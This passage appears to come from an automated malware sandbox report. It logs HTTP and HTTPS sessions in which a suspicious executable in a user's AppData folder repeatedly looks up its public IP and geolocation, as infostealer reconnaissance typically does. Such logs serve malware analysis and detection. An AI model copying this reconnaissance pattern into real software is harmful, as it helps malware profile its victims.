Sep 26, 2024 09:19:28.830696106 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7511094459e1836318334bfb3b233985 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49165	132.226.247.73	80	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:19:29.490706921 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:19:30.178728104 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1faac1b6731a734ceb41d72d8ac0bc6f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:19:30.391808987 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1faac1b6731a734ceb41d72d8ac0bc6f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49167	193.122.130.0	80	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:19:31.273746014 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:19:31.730346918 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f9307f143fb7cdea1541829051b4341f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49169	132.226.8.169	80	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:19:32.417438984 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:19:33.318089962 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:19:33.527750015 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49171	158.101.44.242	80	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:19:34.013765097 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:19:35.386447906 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7fd1da469c7aec1dad3d19f84fbbd14d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49173	132.226.8.169	80	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:19:36.073292971 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:19:37.890122890 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:37 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:19:38.095905066 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:37 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49175	158.101.44.242	80	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:19:38.634649038 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:19:39.532187939 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:39 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a3780790ce785bdf2618e983a0e57ad0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49177	193.122.130.0	80	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:19:40.194757938 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:19:40.650068045 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:40 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c48d5abbacd46f4ee97f28572c9a9c07 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	188.114.97.3	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:19:28 UTC	670	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: EXPIRED Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdpGIiyTV3BTE%2Fhoe7klc%2BldoQP8OsS6KsAxQLNGrFgA7yzGsK7BbVPmysItz4BsK2UikQKs19y9h0DCZ7G97GPPM6%2BzgRLpOPTT9y9%2BiCllUqEiC2q67QkYMNqcKRUYztOS2jIO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c917c618d034282-EWR
2024-09-26 07:19:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:19:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49164	188.114.97.3	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:29 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:19:29 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WAGZdQ54NpGL3mIejwl13H1e0UjE6qbX2ytiHTxUNF7gcoIIbfoOdNCJdfmBX71EN659zi5zNgss%2FAHp7%2B%2B39K0vM00JL%2BALpMfVuNCxkWdqq8%2FVmr%2BYUfmLM8uqQ3csZOJHKx6W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c917c68ac7943d5-EWR
2024-09-26 07:19:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:19:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49166	188.114.96.3	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:30 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:19:30 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hA7N7p03ZtOePoS4q2fvznx968NUb4SMFnY7by%2Br1tcwL%2FPwvdDEaBt0N2moR%2FtH7aZ%2FBDVoUdACuh9qeQ7yCVxDfzTuZlos%2FkC1X3jX%2Fwhd%2BlRVG1HMg8sJdJOZJnMK2SOJ0qh5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c917c715e110fa9-EWR
2024-09-26 07:19:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:19:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49168	188.114.96.3	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:19:32 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mt0Ja%2BzqpmZFMS%2F%2B6v55VFzQ9BCfYLHCvLCcmcTB4EQIpVD5hRatb7Ipv54kdst9JIleA8S5i8saVZWNmh%2F%2FR8hqsYKFxiuePTJ100CJog8kt2p6o2bYJcDlsRMUJM7shJmnqfiJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c917c7ae97c0f73-EWR
2024-09-26 07:19:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:19:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49170	188.114.96.3	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:33 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:19:33 UTC	670	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gt6m4L%2F0B7HaCpNjd6ttXMnEut0AngkvOFVOjZcbF1AICBrQaebe512vQt0Uw8agfgkaSwP8Cqb7ywCF94jJFF30q2UmaFDAdzNTMF25OqlVtRL1i4sBUDWhBbb2bON8lh3w6R%2Fl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c917c84ebcb7d1e-EWR
2024-09-26 07:19:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:19:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49172	188.114.96.3	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:35 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:19:36 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 7 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpR3gdkbA7fIPbY0JhEYjZ0%2Fn2eYOoE%2Bpb6v8Ekzf6RYpTsD4kQ9CazD%2B83LhEBucIqYry6e1mGdebklzh8XbSRhHz0QCPZgz6YrJQ8oBeUV58Tsbil9R7rN7%2FcCDyg%2FcjgE7cYs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c917c91c8904346-EWR
2024-09-26 07:19:36 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:19:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

